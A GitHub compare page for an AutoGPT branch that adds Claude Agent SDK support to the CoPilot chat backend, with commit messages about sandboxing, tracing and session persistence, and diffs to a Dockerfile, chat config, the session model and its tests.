Compare commits

..

63 Commits

Author SHA1 Message Date
Zamil Majdy
744fc59c18 fix(chat/sdk): validate proxy URL before blanking ANTHROPIC_API_KEY
Only override ANTHROPIC_API_KEY="" when both a valid base_url (starts
with http) and api_key are configured. Otherwise fall back to SDK
default credentials so direct Anthropic usage still works.
2026-02-12 13:37:59 +04:00
Zamil Majdy
58847cd242 refactor(chat): rename sdk_ config prefix to claude_agent_ for clarity
Also adds gt=0 validation on claude_agent_max_budget_usd per PR review.
2026-02-12 13:36:48 +04:00
Zamil Majdy
d8453bb304 feat(chat/sdk): route SDK through OpenRouter with model config and usage tracking
- Add sdk_model and sdk_max_budget_usd config fields for SDK-specific settings
- Route SDK CLI API calls through OpenRouter via env vars (ANTHROPIC_BASE_URL,
  ANTHROPIC_AUTH_TOKEN) for per-call token/cost tracking
- Pass model, env, user, and max_budget_usd to ClaudeAgentOptions
- Emit StreamUsage from ResultMessage in response adapter
- Persist token usage to session.usage in SDK streaming loop
- Fix tracing to use configured model instead of hardcoded default
- Update Anthropic fallback to use config.api_key/base_url (OpenRouter routing)
2026-02-12 13:12:42 +04:00
Zamil Majdy
d7f7a2747f fix(backend/chat): Atomic message append to prevent race condition
Replace the read-modify-write pattern in stream_chat_post with an
atomic append_and_save_message helper that acquires the session lock
before re-fetching and appending. This prevents message loss when
concurrent requests modify the same session.
2026-02-12 09:10:43 +04:00
Zamil Majdy
68849e197c format 2026-02-12 08:26:26 +04:00
Zamil Majdy
211478bb29 Revert "style: run ruff format and isort"
This reverts commit 40b58807ab.
2026-02-12 08:25:22 +04:00
Zamil Majdy
0e88dd15b2 feat(chat): add hook-based tracing integration for Claude Agent SDK
- Add create_tracing_hooks() for fine-grained tool timing
- Add merge_hooks() utility to combine security + tracing hooks
- Captures precise pre/post timing for tool executions
- Tracks tool failures via PostToolUseFailure hook
- Integrates seamlessly with existing security hooks
2026-02-12 03:35:16 +00:00
Zamil Majdy
7f3c227f0a feat(chat): add modular Langfuse tracing for Claude Agent SDK
- Create tracing.py with TracedSession context manager
- Automatically trace user messages, SDK messages, and results
- Capture tool calls with input/output and timing
- Log usage and cost from SDK ResultMessage
- No-op when Langfuse not configured (zero overhead)
- Clean integration into service.py via context manager
2026-02-12 03:33:37 +00:00
Zamil Majdy
40b58807ab style: run ruff format and isort 2026-02-12 03:25:19 +00:00
Zamil Majdy
d0e2e6f013 security(service): strengthen path validation for SDK cleanup
- Add empty check after session_id sanitization
- Add assertion for defense-in-depth
- Add explicit '..' traversal check in cleanup
- Replace glob with os.listdir to avoid glob injection
- Add validation that project_dir stays under ~/.claude/projects
- Add warning logs for rejected paths

Addresses CodeQL alert about uncontrolled data in path expression
2026-02-12 03:07:08 +00:00
Zamil Majdy
efdc8d73cc fix(security_hooks): use json.dumps for pattern matching and log warning
- Use json.dumps instead of str() for more predictable pattern matching
- Log warning when SDK not available and security hooks are disabled

Addresses CodeRabbit review feedback
2026-02-12 02:55:04 +00:00
Zamil Majdy
a34810d8a2 revert: remove Bash command extraction from GenericTool
Keep it simple - just show 'Bash completed' instead of special
handling to extract command names like 'jq completed'
2026-02-12 02:53:37 +00:00
Zamil Majdy
038b7d5841 feat(copilot): show specific command name for Bash tool
- Extract command name (jq, grep, etc.) from Bash tool input
- Display 'jq completed' instead of 'Bash completed'
- Add ripgrep and tree to Dockerfile (match ALLOWED_BASH_COMMANDS)
2026-02-12 02:48:19 +00:00
Zamil Majdy
cac93b0cc9 fix(chat): increase SDK buffer limit and add jq
- Add sdk_max_buffer_size config option (default 10MB, was 1MB)
- Pass max_buffer_size to ClaudeAgentOptions to prevent crashes on large tool outputs
- Install jq in Dockerfile for JSON processing capabilities

Fixes AUTOGPT-SERVER-7V2
2026-02-12 02:41:12 +00:00
Zamil Majdy
2025aaf5f2 fix(backend/chat): Preserve full MCP tool output for frontend widgets
The SDK CLI truncates large tool results (writing them to disk),
which breaks frontend widget rendering (e.g., find_block's block
list cards). Stash the full MCP tool output before the SDK sees it,
then use the stash in the response adapter so the frontend always
receives the complete JSON for proper widget parsing.
2026-02-11 23:13:42 +04:00
Zamil Majdy
ae9bce3bae feat(backend/chat): Add sandboxed Bash and notify SDK of restrictions
- Allow Bash tool with command allowlist (jq, grep, head, tail, etc.)
  validated via shlex.split for proper quote handling
- Add workspace path validation for Bash absolute paths
- Add SDK built-in tools (Read/Write/Edit/Glob/Grep/Bash) to allowed_tools
- Append Bash restrictions to system prompt (SDK doesn't know our allowlist)
- Add default_factory to BlockInfoSummary schema fields
- Add 12 Bash sandbox tests covering safe/dangerous commands, substitution,
  redirection, /dev/ access, path escaping
2026-02-11 22:35:39 +04:00
Zamil Majdy
3107d889fc feat(frontend/copilot): Add generic tool widget for unrecognized tools
SDK built-in tools (Read, Glob, Grep, etc.) have no dedicated frontend
widget, so tool calls silently disappeared. Add a GenericTool component
that shows a spinning gear + "Running {tool}…" for any tool-* part
type that doesn't match a known case.
2026-02-11 22:08:03 +04:00
Zamil Majdy
f174fb6303 fix(backend/chat): Strip MCP prefix from SDK tool names for frontend rendering
The Vercel AI SDK frontend renders tool widgets based on tool name
(e.g. "tool-find_block", "tool-run_agent"). The SDK sends tool names
with the MCP prefix (mcp__copilot__find_block) which didn't match
any frontend switch case, causing tool execution to be invisible.

Strip the mcp__copilot__ prefix in the response adapter so tool events
reach the correct frontend widget handlers.
2026-02-11 22:01:59 +04:00
Zamil Majdy
920a4c5f15 feat(backend/chat): Allow Read/Write/Edit/Glob/Grep in SDK within workspace
Move these tools from fully-blocked to workspace-scoped: they are now
allowed when the file path stays within the SDK working directory
(/tmp/copilot-<session>/) or the tool-results directory
(~/.claude/projects/…/tool-results/). This enables the SDK's built-in
oversized tool result handling and workspace file operations.

- Add _validate_workspace_path() with normpath-based path validation
- Pass sdk_cwd from service.py into create_security_hooks()
- Add 20 unit tests covering allowed/denied paths, traversal attacks
2026-02-11 20:39:33 +04:00
Zamil Majdy
e95fadbb86 Merge branch 'dev' into feat/copitlot-claude-code 2026-02-11 20:23:56 +04:00
Zamil Majdy
b14b3803ad feat(backend/chat): Add StreamStartStep/StreamFinishStep to SDK adapter
The non-SDK path emits step boundaries (StartStep/FinishStep) around
each LLM turn and tool cycle. The SDK adapter was missing these,
causing the frontend to lack visual step framing for tool calls.

Now the SDK adapter emits:
- StreamStartStep after init and before each new LLM turn
- StreamFinishStep after tool results and before final finish
2026-02-11 20:18:27 +04:00
Zamil Majdy
82c483d6c8 Merge branch 'dev' into feat/copitlot-claude-code 2026-02-11 07:17:38 +04:00
Zamil Majdy
7cffa1895f fix(backend/chat): Filter duplicate StreamStart from non-SDK path
Routes.py already publishes a StreamStart before calling the service.
The SDK path filters the duplicate internally, but the non-SDK path
did not, causing two StreamStart events to reach the frontend.
2026-02-11 06:52:47 +04:00
Zamil Majdy
9791bdd724 fix(backend/chat): Use normpath+startswith pattern for CodeQL path sanitization
CodeQL doesn't recognize re.sub as a path sanitizer. Switch to the
os.path.normpath + startswith prefix check pattern that CodeQL's
taint model explicitly recognizes as breaking the taint chain.
2026-02-11 06:45:12 +04:00
Zamil Majdy
750a674c78 fix lock 2026-02-11 06:39:03 +04:00
Zamil Majdy
960c7980a3 fix(backend/chat): Use named helper for session_id sanitization to satisfy CodeQL
Replace inline comprehension with _sanitize_session_id() using re.sub
so CodeQL recognizes the path-traversal sanitization barrier.
2026-02-11 06:32:16 +04:00
Zamil Majdy
e85d437bb2 fix(backend/chat): Sanitize session_id in SDK cwd path to prevent path traversal 2026-02-11 06:26:48 +04:00
Zamil Majdy
44f9536bd6 fix lock 2026-02-11 06:24:41 +04:00
Zamil Majdy
1c1085a227 Merge remote-tracking branch 'origin/dev' into feat/copitlot-claude-code
# Conflicts:
#	autogpt_platform/backend/backend/api/features/chat/config.py
#	autogpt_platform/backend/poetry.lock
2026-02-11 05:30:46 +04:00
Zamil Majdy
d7ef70469e fix(backend/chat): Fix cleanup race condition and move to outer finally
- Use session-specific temp dir (/tmp/copilot-{session_id}) as SDK cwd
  to prevent concurrent sessions from deleting each other's tool-result
  files during cleanup
- Move _cleanup_sdk_tool_results() to outer finally block so it runs
  even when the outer except Exception fires
- Clean up the temp cwd directory after each session
- Remove unnecessary inner try/finally nesting
2026-02-11 05:13:02 +04:00
Zamil Majdy
1926127ddd fix(backend/chat): Fix bugs and remove dead code in SDK integration
- Fix message accumulation bug: reset has_appended_assistant when
  creating new post-tool assistant message to prevent lost text deltas
- Fix hardcoded model in anthropic_fallback.py: use config.model instead
  of hardcoded "claude-sonnet-4-20250514"
- Fix _SDK_TOOL_RESULTS_DIR using hardcoded /root/ path: use expanduser
- Remove unused create_strict_security_hooks (~75 lines)
- Remove unused create_heartbeat/create_usage from response adapter
- Remove unused RAW_TOOL_NAMES from tool_adapter
- Extract _MAX_TOOL_ITERATIONS constant from magic number
2026-02-11 04:42:05 +04:00
Zamil Majdy
8b509e56de refactor(backend/chat): Replace --resume with conversation context, add compaction and dedup
- Remove broken --resume/session file approach (CLI v2.1.38 can't load
  >2 message session files) and delete session_file.py + tests
- Embed prior conversation turns as <conversation_history> context in
  the user message for multi-turn memory
- Add context compaction using shared compress_context() from prompt.py
  with LLM summarization + truncation fallback for long conversations
- Reuse _build_system_prompt and _generate_session_title from parent
  service.py instead of duplicating (gains Langfuse prompt support)
- Add has_conversation_history param to _build_system_prompt to avoid
  greeting on multi-turn conversations
- Fix _SDK_TOOL_RESULTS_GLOB from hardcoded /root/ to expanduser ~/
2026-02-11 04:22:11 +04:00
Zamil Majdy
acb2d0bd1b fix(backend/chat): Resolve symlinks in session file path for --resume
The CLI resolves symlinks when computing its project directory (e.g.
/tmp -> /private/tmp on macOS), so our session file writes must use
the resolved path to match. Also adds cwd to ClaudeAgentOptions and
debug logging for SDK messages.
2026-02-10 20:11:16 +04:00
Zamil Majdy
51aa369c80 fix(backend): Restore PyYAML cp38 wheel entries in poetry.lock
Re-add Python 3.8 wheel entries for PyYAML that were dropped by
poetry lock resolution, keeping the lockfile consistent with dev.
2026-02-10 20:06:45 +04:00
Zamil Majdy
6403ffe353 fix(backend/chat): Use --resume with session files for multi-turn conversations
Replace broken AsyncIterable approach (CLI rejects assistant-type stdin
messages) with JSONL session files written to the CLI's storage directory.
This enables --resume to load full user+assistant context with turn-level
compaction support for long conversations.
2026-02-10 18:46:33 +04:00
Zamil Majdy
c40a98ba3c Merge branches 'feat/copitlot-claude-code' and 'dev' of github.com:Significant-Gravitas/AutoGPT into feat/copitlot-claude-code 2026-02-10 18:19:23 +04:00
Zamil Majdy
a31fc8b162 refactor(backend/chat): Use proper SDK types and in-memory conversation history
Replace duck typing (class name checks, getattr) with isinstance() using
SDK-exported dataclasses. Replace file-based --resume with AsyncIterable
message injection for conversation history, eliminating disk I/O. Add 15
unit tests for the response adapter.
2026-02-10 18:17:00 +04:00
Zamil Majdy
0f2d1a6553 Merge branch 'dev' into feat/copitlot-claude-code 2026-02-10 17:23:06 +04:00
Zamil Majdy
87d817b83b fix(backend/chat): Allow MCP-registered tools through security hook and fix title generation
- Skip BLOCKED_TOOLS check for tools with mcp__copilot__ prefix since they
  are already sandboxed by tool_adapter (fixes Read tool being blocked)
- Fall back to session.messages for title generation when message=None
2026-02-10 17:15:42 +04:00
Zamil Majdy
acf932bf4f refactor(backend/chat): Move glob/os imports to top-level in SDK service 2026-02-10 16:57:11 +04:00
Zamil Majdy
f562d9a277 fix(backend/chat): Add Read tool for SDK oversized tool results
The Claude Agent SDK saves tool results exceeding its token limit to
files and instructs the agent to read them back with a Read tool. Our
MCP server didn't have this tool, breaking the agent on large results
like run_block output (117K+ chars).

Changes:
- Add a Read tool to the MCP server (restricted to /root/.claude/)
- Register it in COPILOT_TOOL_NAMES so the SDK can use it
- Add safety-net truncation at 500K chars for extreme cases
- Clean up SDK tool-result files after each client session
2026-02-10 16:53:04 +04:00
Zamil Majdy
3c92a96504 fix(backend/chat): Publish StreamError before StreamFinish on error paths
When run_ai_generation() or event_generator() encounter errors, they
were only publishing StreamFinish without a preceding StreamError. The
frontend treats finish-without-error as normal completion, leaving the
user with an apparently stuck/empty response requiring a page refresh.
2026-02-10 15:49:23 +04:00
Zamil Majdy
8b8e1df739 fix(backend/chat): Auto-expire stale running tasks to unblock sessions
Tasks stuck in "running" status beyond stream_timeout (300s) are now
auto-marked as failed when looked up, preventing zombie tasks from
blocking the session indefinitely.
2026-02-10 15:35:43 +04:00
Zamil Majdy
602a0a4fb1 fix(backend/chat): Strip tool call noise from conversation history context 2026-02-10 14:11:27 +04:00
Zamil Majdy
8d7d531ae0 refactor(backend/chat): Remove unused max_context_messages config 2026-02-10 13:57:33 +04:00
Zamil Majdy
43153a12e0 fix(backend/chat): Remove manual context truncation from SDK path, let SDK handle compaction 2026-02-10 13:52:49 +04:00
Zamil Majdy
587e11c60a refactor(backend/chat): Extract MCP server name constants to avoid hardcoded strings 2026-02-10 12:12:08 +04:00
Zamil Majdy
57da545e02 Merge branch 'dev' into feat/copitlot-claude-code 2026-02-10 12:10:35 +04:00
Zamil Majdy
626980bf27 Merge branch 'dev' into feat/copitlot-claude-code 2026-02-09 19:26:52 +04:00
Swifty
e42b27af3c Merge branch 'dev' into feat/copitlot-claude-code 2026-02-09 09:12:23 +01:00
Zamil Majdy
34face15d2 fix lock 2026-02-09 11:45:59 +04:00
Zamil Majdy
7d32c83f95 fix(backend/chat): Handle non-serializable SDK objects in tool result output 2026-02-09 10:59:50 +04:00
Zamil Majdy
6e2a45b84e style(backend): Remove unused pytest import in execution_queue_test 2026-02-09 10:14:20 +04:00
Zamil Majdy
32f6532e9c Merge branch 'dev' of github.com:Significant-Gravitas/AutoGPT into feat/copitlot-claude-code 2026-02-09 10:10:32 +04:00
Zamil Majdy
0bbe8a184d Merge dev and resolve poetry.lock conflict 2026-02-08 19:40:17 +04:00
Zamil Majdy
7592deed63 fix(backend/chat): Address remaining PR review comments
- Fix tool_call_id always being "sdk-call" by generating unique IDs per invocation
- Fix validation using original tool_name instead of clean_name in security hooks
- Fix duplicate StreamFinish in Anthropic fallback path
- Fix ImportError fallback returning plain dict instead of re-raising
- Extract _build_input_schema helper to deduplicate schema construction
- Add else branch for unhandled SDK message types for observability
- Truncate large tool results in conversation history to prevent context overflow
2026-02-08 19:39:10 +04:00
Zamil Majdy
b9c759ce4f fix(backend/chat): Address additional PR review comments
- Add terminal StreamFinish in adapt_sdk_stream if SDK ends without one
- Sanitize error message in adapt_sdk_stream exception handler
- Pass full JSON schema (type, properties, required) to tool decorator
2026-02-08 07:14:45 +04:00
Zamil Majdy
5efb80d47b fix(backend/chat): Address PR review comments for Claude SDK integration
- Add StreamFinish after ErrorMessage in response adapter
- Fix str.replace to removeprefix in security hooks
- Apply max_context_messages limit as safety guard in history formatting
- Add empty prompt guard before sending to SDK
- Sanitize error messages to avoid exposing internal details
- Fix fire-and-forget asyncio.create_task by storing task reference
- Fix tool_calls population on assistant messages
- Rewrite Anthropic fallback to persist messages and merge consecutive roles
- Only use ANTHROPIC_API_KEY for fallback (not OpenRouter keys)
- Fix IndexError when tool result content list is empty
2026-02-06 13:25:10 +04:00
Zamil Majdy
b49d8e2cba fix lock 2026-02-06 13:19:53 +04:00
Zamil Majdy
452544530d feat(chat/sdk): Enable native SDK context compaction
- Remove manual truncation in conversation history formatting
- SDK's automatic compaction handles context limits intelligently
- Add observability hooks:
  - PreCompact: Log when SDK triggers context compaction
  - PostToolUse: Log successful tool executions
  - PostToolUseFailure: Log and debug failed tool executions
- Update config: increase max_context_messages (SDK handles compaction)
2026-02-06 12:44:48 +04:00
Zamil Majdy
32ee7e6cf8 fix(chat): Remove aggressive stale task detection
The 60-second timeout was too aggressive and could incorrectly mark
legitimate long-running tool calls as stale. Relying on Redis TTL
(1 hour) for cleanup is sufficient and more reliable.
2026-02-06 11:45:54 +04:00
Zamil Majdy
670663c406 Merge dev and resolve poetry.lock conflict 2026-02-06 11:40:41 +04:00
Zamil Majdy
0dbe4cf51e feat(backend/chat): Add Claude Agent SDK integration for CoPilot
This PR adds Claude Agent SDK as the default backend for CoPilot chat completions,
replacing the direct OpenAI API integration.

Key changes:
- Add Claude Agent SDK service layer with MCP tool adapter
- Fix message persistence after tool calls (messages no longer disappear on refresh)
- Add OpenRouter tracing for session title generation
- Add security hooks for user context validation
- Add Anthropic fallback when SDK is not available
- Clean up excessive debug logging
2026-02-06 11:38:17 +04:00
89 changed files with 15385 additions and 454 deletions

View File

@@ -62,12 +62,16 @@ ENV POETRY_HOME=/opt/poetry \
DEBIAN_FRONTEND=noninteractive
ENV PATH=/opt/poetry/bin:$PATH
# Install Python, FFmpeg, and ImageMagick (required for video processing blocks)
# Install Python, FFmpeg, ImageMagick, and CLI tools for agent use
# CLI tools match ALLOWED_BASH_COMMANDS in security_hooks.py
RUN apt-get update && apt-get install -y \
python3.13 \
python3-pip \
ffmpeg \
imagemagick \
jq \
ripgrep \
tree \
&& rm -rf /var/lib/apt/lists/*
# Copy only necessary files from builder

View File

@@ -27,12 +27,11 @@ class ChatConfig(BaseSettings):
session_ttl: int = Field(default=43200, description="Session TTL in seconds")
# Streaming Configuration
max_context_messages: int = Field(
default=50, ge=1, le=200, description="Maximum context messages"
)
stream_timeout: int = Field(default=300, description="Stream timeout in seconds")
max_retries: int = Field(default=3, description="Maximum number of retries")
max_retries: int = Field(
default=3,
description="Max retries for fallback path (SDK handles retries internally)",
)
max_agent_runs: int = Field(default=30, description="Maximum number of agent runs")
max_agent_schedules: int = Field(
default=30, description="Maximum number of agent schedules"
@@ -93,6 +92,27 @@ class ChatConfig(BaseSettings):
description="Name of the prompt in Langfuse to fetch",
)
# Claude Agent SDK Configuration
use_claude_agent_sdk: bool = Field(
default=True,
description="Use Claude Agent SDK for chat completions",
)
claude_agent_model: str | None = Field(
default=None,
description="Model for the Claude Agent SDK path. If None, derives from "
"the `model` field by stripping the OpenRouter provider prefix.",
)
claude_agent_max_budget_usd: float | None = Field(
default=None,
gt=0,
description="Max budget in USD per Claude Agent SDK session (None = unlimited)",
)
claude_agent_max_buffer_size: int = Field(
default=10 * 1024 * 1024, # 10MB (default SDK is 1MB)
description="Max buffer size in bytes for Claude Agent SDK JSON message parsing. "
"Increase if tool outputs exceed the limit.",
)
# Extended thinking configuration for Claude models
thinking_enabled: bool = Field(
default=True,
@@ -138,6 +158,17 @@ class ChatConfig(BaseSettings):
v = os.getenv("CHAT_INTERNAL_API_KEY")
return v
@field_validator("use_claude_agent_sdk", mode="before")
@classmethod
def get_use_claude_agent_sdk(cls, v):
"""Get use_claude_agent_sdk from environment if not provided."""
# Check environment variable - default to True if not set
env_val = os.getenv("CHAT_USE_CLAUDE_AGENT_SDK", "").lower()
if env_val:
return env_val in ("true", "1", "yes", "on")
# Default to True (SDK enabled by default)
return True if v is None else v
# Prompt paths for different contexts
PROMPT_PATHS: dict[str, str] = {
"default": "prompts/chat_system.md",

View File

@@ -2,7 +2,7 @@ import asyncio
import logging
import uuid
from datetime import UTC, datetime
from typing import Any, cast
from typing import Any
from weakref import WeakValueDictionary
from openai.types.chat import (
@@ -104,26 +104,6 @@ class ChatSession(BaseModel):
successful_agent_runs: dict[str, int] = {}
successful_agent_schedules: dict[str, int] = {}
def add_tool_call_to_current_turn(self, tool_call: dict) -> None:
"""Attach a tool_call to the current turn's assistant message.
Searches backwards for the most recent assistant message (stopping at
any user message boundary). If found, appends the tool_call to it.
Otherwise creates a new assistant message with the tool_call.
"""
for msg in reversed(self.messages):
if msg.role == "user":
break
if msg.role == "assistant":
if not msg.tool_calls:
msg.tool_calls = []
msg.tool_calls.append(tool_call)
return
self.messages.append(
ChatMessage(role="assistant", content="", tool_calls=[tool_call])
)
@staticmethod
def new(user_id: str) -> "ChatSession":
return ChatSession(
@@ -192,47 +172,6 @@ class ChatSession(BaseModel):
successful_agent_schedules=successful_agent_schedules,
)
@staticmethod
def _merge_consecutive_assistant_messages(
messages: list[ChatCompletionMessageParam],
) -> list[ChatCompletionMessageParam]:
"""Merge consecutive assistant messages into single messages.
Long-running tool flows can create split assistant messages: one with
text content and another with tool_calls. Anthropic's API requires
tool_result blocks to reference a tool_use in the immediately preceding
assistant message, so these splits cause 400 errors via OpenRouter.
"""
if len(messages) < 2:
return messages
result: list[ChatCompletionMessageParam] = [messages[0]]
for msg in messages[1:]:
prev = result[-1]
if prev.get("role") != "assistant" or msg.get("role") != "assistant":
result.append(msg)
continue
prev = cast(ChatCompletionAssistantMessageParam, prev)
curr = cast(ChatCompletionAssistantMessageParam, msg)
curr_content = curr.get("content") or ""
if curr_content:
prev_content = prev.get("content") or ""
prev["content"] = (
f"{prev_content}\n{curr_content}" if prev_content else curr_content
)
curr_tool_calls = curr.get("tool_calls")
if curr_tool_calls:
prev_tool_calls = prev.get("tool_calls")
prev["tool_calls"] = (
list(prev_tool_calls) + list(curr_tool_calls)
if prev_tool_calls
else list(curr_tool_calls)
)
return result
def to_openai_messages(self) -> list[ChatCompletionMessageParam]:
messages = []
for message in self.messages:
@@ -319,7 +258,7 @@ class ChatSession(BaseModel):
name=message.name or "",
)
)
return self._merge_consecutive_assistant_messages(messages)
return messages
async def _get_session_from_cache(session_id: str) -> ChatSession | None:
@@ -334,9 +273,8 @@ async def _get_session_from_cache(session_id: str) -> ChatSession | None:
try:
session = ChatSession.model_validate_json(raw_session)
logger.info(
f"Loading session {session_id} from cache: "
f"message_count={len(session.messages)}, "
f"roles={[m.role for m in session.messages]}"
f"[CACHE] Loaded session {session_id}: {len(session.messages)} messages, "
f"last_roles={[m.role for m in session.messages[-3:]]}" # Last 3 roles
)
return session
except Exception as e:
@@ -378,11 +316,9 @@ async def _get_session_from_db(session_id: str) -> ChatSession | None:
return None
messages = prisma_session.Messages
logger.info(
f"Loading session {session_id} from DB: "
f"has_messages={messages is not None}, "
f"message_count={len(messages) if messages else 0}, "
f"roles={[m.role for m in messages] if messages else []}"
logger.debug(
f"[DB] Loaded session {session_id}: {len(messages) if messages else 0} messages, "
f"roles={[m.role for m in messages[-3:]] if messages else []}" # Last 3 roles
)
return ChatSession.from_db(prisma_session, messages)
@@ -433,10 +369,9 @@ async def _save_session_to_db(
"function_call": msg.function_call,
}
)
logger.info(
f"Saving {len(new_messages)} new messages to DB for session {session.session_id}: "
f"roles={[m['role'] for m in messages_data]}, "
f"start_sequence={existing_message_count}"
logger.debug(
f"[DB] Saving {len(new_messages)} messages to session {session.session_id}, "
f"roles={[m['role'] for m in messages_data]}"
)
await chat_db.add_chat_messages_batch(
session_id=session.session_id,
@@ -476,7 +411,7 @@ async def get_chat_session(
logger.warning(f"Unexpected cache error for session {session_id}: {e}")
# Fall back to database
logger.info(f"Session {session_id} not in cache, checking database")
logger.debug(f"Session {session_id} not in cache, checking database")
session = await _get_session_from_db(session_id)
if session is None:
@@ -493,7 +428,6 @@ async def get_chat_session(
# Cache the session from DB
try:
await _cache_session(session)
logger.info(f"Cached session {session_id} from database")
except Exception as e:
logger.warning(f"Failed to cache session {session_id}: {e}")
@@ -558,6 +492,40 @@ async def upsert_chat_session(
return session
async def append_and_save_message(session_id: str, message: ChatMessage) -> ChatSession:
"""Atomically append a message to a session and persist it.
Acquires the session lock, re-fetches the latest session state,
appends the message, and saves — preventing message loss when
concurrent requests modify the same session.
"""
lock = await _get_session_lock(session_id)
async with lock:
session = await get_chat_session(session_id)
if session is None:
raise ValueError(f"Session {session_id} not found")
session.messages.append(message)
existing_message_count = await chat_db.get_chat_session_message_count(
session_id
)
try:
await _save_session_to_db(session, existing_message_count)
except Exception as e:
raise DatabaseError(
f"Failed to persist message to session {session_id}"
) from e
try:
await _cache_session(session)
except Exception as e:
logger.warning(f"Cache write failed for session {session_id}: {e}")
return session
async def create_chat_session(user_id: str) -> ChatSession:
"""Create a new chat session and persist it.
@@ -664,13 +632,19 @@ async def update_session_title(session_id: str, title: str) -> bool:
logger.warning(f"Session {session_id} not found for title update")
return False
# Invalidate cache so next fetch gets updated title
# Update title in cache if it exists (instead of invalidating).
# This prevents race conditions where cache invalidation causes
# the frontend to see stale DB data while streaming is still in progress.
try:
redis_key = _get_session_cache_key(session_id)
async_redis = await get_redis_async()
await async_redis.delete(redis_key)
cached = await _get_session_from_cache(session_id)
if cached:
cached.title = title
await _cache_session(cached)
except Exception as e:
logger.warning(f"Failed to invalidate cache for session {session_id}: {e}")
# Not critical - title will be correct on next full cache refresh
logger.warning(
f"Failed to update title in cache for session {session_id}: {e}"
)
return True
except Exception as e:

View File

@@ -1,16 +1,4 @@
from typing import cast
import pytest
from openai.types.chat import (
ChatCompletionAssistantMessageParam,
ChatCompletionMessageParam,
ChatCompletionToolMessageParam,
ChatCompletionUserMessageParam,
)
from openai.types.chat.chat_completion_message_tool_call_param import (
ChatCompletionMessageToolCallParam,
Function,
)
from .model import (
ChatMessage,
@@ -129,205 +117,3 @@ async def test_chatsession_db_storage(setup_test_user, test_user_id):
loaded.tool_calls is not None
), f"Tool calls missing for {orig.role} message"
assert len(orig.tool_calls) == len(loaded.tool_calls)
# --------------------------------------------------------------------------- #
# _merge_consecutive_assistant_messages #
# --------------------------------------------------------------------------- #
_tc = ChatCompletionMessageToolCallParam(
id="tc1", type="function", function=Function(name="do_stuff", arguments="{}")
)
_tc2 = ChatCompletionMessageToolCallParam(
id="tc2", type="function", function=Function(name="other", arguments="{}")
)
def test_merge_noop_when_no_consecutive_assistants():
"""Messages without consecutive assistants are returned unchanged."""
msgs = [
ChatCompletionUserMessageParam(role="user", content="hi"),
ChatCompletionAssistantMessageParam(role="assistant", content="hello"),
ChatCompletionUserMessageParam(role="user", content="bye"),
]
merged = ChatSession._merge_consecutive_assistant_messages(msgs)
assert len(merged) == 3
assert [m["role"] for m in merged] == ["user", "assistant", "user"]
def test_merge_splits_text_and_tool_calls():
"""The exact bug scenario: text-only assistant followed by tool_calls-only assistant."""
msgs = [
ChatCompletionUserMessageParam(role="user", content="build agent"),
ChatCompletionAssistantMessageParam(
role="assistant", content="Let me build that"
),
ChatCompletionAssistantMessageParam(
role="assistant", content="", tool_calls=[_tc]
),
ChatCompletionToolMessageParam(role="tool", content="ok", tool_call_id="tc1"),
]
merged = ChatSession._merge_consecutive_assistant_messages(msgs)
assert len(merged) == 3
assert merged[0]["role"] == "user"
assert merged[2]["role"] == "tool"
a = cast(ChatCompletionAssistantMessageParam, merged[1])
assert a["role"] == "assistant"
assert a.get("content") == "Let me build that"
assert a.get("tool_calls") == [_tc]
def test_merge_combines_tool_calls_from_both():
"""Both consecutive assistants have tool_calls — they get merged."""
msgs: list[ChatCompletionAssistantMessageParam] = [
ChatCompletionAssistantMessageParam(
role="assistant", content="text", tool_calls=[_tc]
),
ChatCompletionAssistantMessageParam(
role="assistant", content="", tool_calls=[_tc2]
),
]
merged = ChatSession._merge_consecutive_assistant_messages(msgs) # type: ignore[arg-type]
assert len(merged) == 1
a = cast(ChatCompletionAssistantMessageParam, merged[0])
assert a.get("tool_calls") == [_tc, _tc2]
assert a.get("content") == "text"
def test_merge_three_consecutive_assistants():
"""Three consecutive assistants collapse into one."""
msgs: list[ChatCompletionAssistantMessageParam] = [
ChatCompletionAssistantMessageParam(role="assistant", content="a"),
ChatCompletionAssistantMessageParam(role="assistant", content="b"),
ChatCompletionAssistantMessageParam(
role="assistant", content="", tool_calls=[_tc]
),
]
merged = ChatSession._merge_consecutive_assistant_messages(msgs) # type: ignore[arg-type]
assert len(merged) == 1
a = cast(ChatCompletionAssistantMessageParam, merged[0])
assert a.get("content") == "a\nb"
assert a.get("tool_calls") == [_tc]
def test_merge_empty_and_single_message():
"""Edge cases: empty list and single message."""
assert ChatSession._merge_consecutive_assistant_messages([]) == []
single: list[ChatCompletionMessageParam] = [
ChatCompletionUserMessageParam(role="user", content="hi")
]
assert ChatSession._merge_consecutive_assistant_messages(single) == single
# --------------------------------------------------------------------------- #
# add_tool_call_to_current_turn #
# --------------------------------------------------------------------------- #
_raw_tc = {
"id": "tc1",
"type": "function",
"function": {"name": "f", "arguments": "{}"},
}
_raw_tc2 = {
"id": "tc2",
"type": "function",
"function": {"name": "g", "arguments": "{}"},
}
def test_add_tool_call_appends_to_existing_assistant():
"""When the last assistant is from the current turn, tool_call is added to it."""
session = ChatSession.new(user_id="u")
session.messages = [
ChatMessage(role="user", content="hi"),
ChatMessage(role="assistant", content="working on it"),
]
session.add_tool_call_to_current_turn(_raw_tc)
assert len(session.messages) == 2 # no new message created
assert session.messages[1].tool_calls == [_raw_tc]
def test_add_tool_call_creates_assistant_when_none_exists():
"""When there's no current-turn assistant, a new one is created."""
session = ChatSession.new(user_id="u")
session.messages = [
ChatMessage(role="user", content="hi"),
]
session.add_tool_call_to_current_turn(_raw_tc)
assert len(session.messages) == 2
assert session.messages[1].role == "assistant"
assert session.messages[1].tool_calls == [_raw_tc]
def test_add_tool_call_does_not_cross_user_boundary():
"""A user message acts as a boundary — previous assistant is not modified."""
session = ChatSession.new(user_id="u")
session.messages = [
ChatMessage(role="assistant", content="old turn"),
ChatMessage(role="user", content="new message"),
]
session.add_tool_call_to_current_turn(_raw_tc)
assert len(session.messages) == 3 # new assistant was created
assert session.messages[0].tool_calls is None # old assistant untouched
assert session.messages[2].role == "assistant"
assert session.messages[2].tool_calls == [_raw_tc]
def test_add_tool_call_multiple_times():
"""Multiple long-running tool calls accumulate on the same assistant."""
session = ChatSession.new(user_id="u")
session.messages = [
ChatMessage(role="user", content="hi"),
ChatMessage(role="assistant", content="doing stuff"),
]
session.add_tool_call_to_current_turn(_raw_tc)
# Simulate a pending tool result in between (like _yield_tool_call does)
session.messages.append(
ChatMessage(role="tool", content="pending", tool_call_id="tc1")
)
session.add_tool_call_to_current_turn(_raw_tc2)
assert len(session.messages) == 3 # user, assistant, tool — no extra assistant
